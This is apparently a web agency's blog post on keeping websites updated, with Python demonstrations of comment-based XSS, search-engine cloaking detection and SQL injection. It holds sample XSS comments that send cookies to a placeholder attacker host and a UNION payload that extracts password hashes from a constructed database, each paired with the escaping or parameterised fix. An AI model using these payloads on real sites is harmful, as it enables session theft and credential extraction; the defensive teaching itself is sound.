
Don’t Get Hacked

It takes more than passion to run a website. There are hosting costs, development time, and considerable effort required to make it a success. Don’t be fooled into believing the job’s done once the website is up and running. Some people would happily see all that disappear simply for the sake of self-aggrandising promotion, or to sell your customers’ details on one of many online black markets. There are several reasons to keep a website up-to-date, some of which may not be instantly obvious…


Usability

Keeping up with the latest web design trends is becoming an important part of how the internet grows. Web developers are expected to use frameworks and external code over which we have very little control. Modern browsers update automagically, so not keeping a website current could mean your site becomes unsightly on older devices or, oddly, newer ones.

A good example of this is Apple’s defiance of standards in requiring a specific tag, the apple-touch-icon link, to show your website’s icon when a visitor saves a link to it. The code below only works on Apple devices and isn’t required for a website to work. To add further confusion there are device-specific sizes:

[image: Apple icons]

The icons aren’t essential, but leaving them out means less control than desired and, if it matters, probably a less than optimal image, which could make all the difference in a competitive market.

Marketing

The marketing impact of an outdated website may not be obvious at first. A developer will be used to updating deprecated code, but many site owners don’t have the time to be so syntax savvy. Search engine optimisation has a well known and documented methodology, which requires tedious attention to detail and constantly evolving content and code. Leaving redundant code on your website, or not updating existing code to meet current standards, can have negative effects on any associated marketing campaign.

A good example of outdated marketing code is an old Google Analytics tracking snippet. Forgetting to update Facebook/Twitter sharing code means users could get an error message when trying to help promote your website.

Security

Creating reliable software is hard. Creating reliable and secure software is almost impossible. The result has been a very long game of cat and mouse between developers and hackers. This isn’t the ideal scenario, but it’s what we have whether we like it or not. It is therefore critical to keep an eye on website software updates and apply them promptly, so that you aren’t an easy target for malicious users.

After software such as WordPress or ModX is released, people keep finding bugs in the code which could be used maliciously. Some report their findings so that the bug is fixed and published as a CVE entry. Others simply exploit the newly found bugs for profit, for political gain, or simply because they can.

Old websites are rightly considered insecure, for an obvious reason: the bugs in the versions they run are public knowledge. Frameworks and scripts are a common target for hackers because one exploit can mean millions of potential victims.

Worst case scenario

Of course, all of the above could occur at the same time. So, let’s imagine a worst case scenario, which happens far more often than anyone would like…

A malicious user posts a comment on your website. The comment is seen by every visitor, guest or staff member alike. It has three purposes:

  1. Deliver malware to guests
  2. Steal login details of staff members
  3. Detect if the visitor is Google, then show links to other hacked pages

Unless it is properly sanitised (every piece of user-supplied text escaped before it is written into the page), the comment can be used to deliver exploits to other users of the website. Their compromised machines, “zombies”, are then used to attack other websites with Denial of Service attacks and similar techniques. Unless your browser and anti-virus software are up-to-date you’re fair game for any blackhat trying to make a name for themselves.
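To make “properly sanitised” concrete, here is an added example (not code from the original article or from any CMS) of three ways a site might render a stored comment. The comment strings, the author name and the attacker.example host are constructed for the demonstration. The parser at the bottom reads the rendered markup the way a browser would and lists anything that would execute, which is how you can see that deleting `<script>` tags is not enough and that escaping on output is:

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample comments. attacker.example is a placeholder host, not a
# real endpoint.
BENIGN_COMMENT = "Thanks, this helped me a lot <3"
SCRIPT_COMMENT = (
    'Great post! <script>new Image().src="https://attacker.example/c?"'
    '+encodeURIComponent(document.cookie);</script>'
)
IMG_COMMENT = (
    'Nice site <img src=x onerror="location=\'https://attacker.example/?\''
    '+document.cookie">'
)


def render_comment_unsafe(author, body):
    """The bug: untrusted text is dropped straight into the page markup."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_blocklist(author, body):
    """A common but broken 'fix': delete <script> tags and hope.
    Event-handler attributes such as onerror= sail straight through."""
    cleaned = re.sub(r"<\s*/?\s*script[^>]*>", "", body, flags=re.I)
    return f'<div class="comment"><b>{author}</b>: {cleaned}</div>'


def render_comment_safe(author, body):
    """The fix: every untrusted string is HTML-escaped on output, so the
    browser sees text, never elements or attributes."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')


class ActiveContentFinder(HTMLParser):
    """Parses markup as a browser would and records anything that would run:
    script-like elements, on* event handlers and javascript: URLs."""
    SCRIPT_LIKE = {"script", "iframe", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in self.SCRIPT_LIKE:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in ("href", "src") and value and \
                    value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} on <{tag}>")


def find_active_content(markup):
    """Return the executable things found in rendered markup ([] means clean)."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    renderers = (render_comment_unsafe, render_comment_blocklist, render_comment_safe)
    for renderer in renderers:
        for body in (BENIGN_COMMENT, SCRIPT_COMMENT, IMG_COMMENT):
            print(f"{renderer.__name__:26} {find_active_content(renderer('bob', body))}")
```

Escaping on output is the minimum. If comments must allow some markup, run them through an allowlist sanitiser rather than a blocklist, and mark session cookies HttpOnly so a script that does get through cannot simply read them.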


Anyone with access to an administrator panel is also a target. Contrary to popular belief, it doesn’t need to be an administrator account: once basic access has been granted, one can often escalate permissions from there. JavaScript embedded in a comment runs in the browser of every logged-in staff member who views it, with their session, so it can read cookies or submit requests on their behalf; the same foothold is what makes CSRF exploitation practical.

Showing links only to Google, known as cloaking, is a common method blackhat hackers use to boost the rankings of other sites they control while staying invisible to ordinary users and to the site owner. It is often paired with the attacks listed above.
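Because the spam links are hidden from you, you have to look for them the way a crawler does. The added example below (not from the original article) fetches the same page twice, once with an ordinary browser User-Agent and once with Googlebot’s published one, and reports links that only the crawler is shown. The two page bodies, the spam hostnames and the `serve_page` function standing in for the hacked site are constructed for the demonstration; against a live site you would pass a function that performs the HTTP request with the given User-Agent header:

```python
from html.parser import HTMLParser

# Constructed responses for one URL on a compromised site: the injected code
# appends hidden spam links only when the visitor claims to be Googlebot.
NORMAL_PAGE = """<html><body>
<h1>Our Services</h1>
<p>We build websites. <a href="/contact">Contact us</a></p>
</body></html>"""

CLOAKED_PAGE = NORMAL_PAGE.replace("</body>", """<div style="display:none">
<a href="http://cheap-pills.example/">cheap pills</a>
<a href="http://casino-bonus.example/">casino bonus</a>
</div>
</body>""")

# Google's published Googlebot token and an ordinary desktop browser string.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0"


def serve_page(user_agent):
    """Stand-in for the hacked site's response: cloaks on the User-Agent header."""
    return CLOAKED_PAGE if "Googlebot" in user_agent else NORMAL_PAGE


class LinkCollector(HTMLParser):
    """Collects every href from <a> elements, hidden or not."""

    def __init__(self):
        super().__init__()
        self.hrefs = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.add(value)


def extract_links(markup):
    collector = LinkCollector()
    collector.feed(markup)
    collector.close()
    return sorted(collector.hrefs)


def find_cloaked_links(fetch, browser_ua=BROWSER_UA, bot_ua=GOOGLEBOT_UA):
    """Fetch the same page as a browser and as Googlebot; return the links
    only the crawler is shown. `fetch` takes a User-Agent string and returns
    the HTML (here the constructed serve_page; in practice an HTTP client)."""
    seen_by_browser = set(extract_links(fetch(browser_ua)))
    seen_by_bot = set(extract_links(fetch(bot_ua)))
    return sorted(seen_by_bot - seen_by_browser)


if __name__ == "__main__":
    for link in find_cloaked_links(serve_page):
        print("cloaked link:", link)
```

This catches cloaking keyed on the User-Agent header, which is the usual case. Injected code that checks the visitor’s IP address against Google’s ranges will not be fooled by a spoofed header; for that, look at the page as Google actually crawled it in Search Console’s URL Inspection tool.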

LulzSec broke into some of the biggest government and corporate websites on the planet in 2011 largely by way of SQL injection, a bug you can often spot by simply appending an apostrophe to a query-string parameter and watching for a database error. Data enumeration and exfiltration beyond that point is fairly simple.
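The apostrophe test and what follows it, as an added example that is not part of the original article. The in-memory SQLite database, its two tables and the placeholder password hashes are constructed for the demonstration; the vulnerable lookup pastes a `?page=` value into the SQL text the way careless CMS code does, and the safe one binds it as a parameter. The probe appends a single quote and treats a database error as the tell; the UNION payload then shows why that tell matters:

```python
import sqlite3


def build_demo_db():
    """Constructed stand-in for a CMS database; the hashes are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (slug TEXT PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO pages VALUES ('about', 'About us', 'We build websites.');
        INSERT INTO pages VALUES ('contact', 'Contact', 'Call us.');
        INSERT INTO users VALUES ('admin', 'placeholder-hash-1');
        INSERT INTO users VALUES ('editor', 'placeholder-hash-2');
    """)
    return conn


def get_page_vulnerable(conn, slug):
    """The bug: the ?page= value is pasted into the SQL text, so the quote
    that closes the literal is under the visitor's control."""
    sql = f"SELECT title, body FROM pages WHERE slug = '{slug}'"
    return conn.execute(sql).fetchall()


def get_page_safe(conn, slug):
    """The fix: the value is bound as a parameter and can only ever be data."""
    return conn.execute(
        "SELECT title, body FROM pages WHERE slug = ?", (slug,)
    ).fetchall()


def apostrophe_probe(lookup, conn, slug="about"):
    """The check from the article: append a single quote to the parameter.
    A database error means the input reached the SQL parser."""
    try:
        lookup(conn, slug + "'")
    except sqlite3.Error:
        return True
    return False


# Once the probe succeeds, the same hole reads other tables. The column count
# must match the original SELECT, and '--' comments out the dangling quote.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM users--"


if __name__ == "__main__":
    conn = build_demo_db()
    for name, lookup in (("vulnerable", get_page_vulnerable), ("safe", get_page_safe)):
        print(name, "breaks on apostrophe:", apostrophe_probe(lookup, conn))
        print(name, "returns for UNION payload:", lookup(conn, UNION_PAYLOAD))
```

Against the parameterised version both inputs are just slugs that match nothing. The same rule applies whatever the platform: in WordPress, for instance, custom queries go through `$wpdb->prepare()` rather than string concatenation.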

About Michael Bell One

Michael Bell One is a web design, SEO (Search Engine Optimisation) and digital marketing agency based in Lewes, East Sussex, and with offices in Sussex, Surrey, London and Kent.

To talk to us about your web design, SEO or Branding project, contact Jake Judd or David Park on 01273 478822 or simply send us an email instead.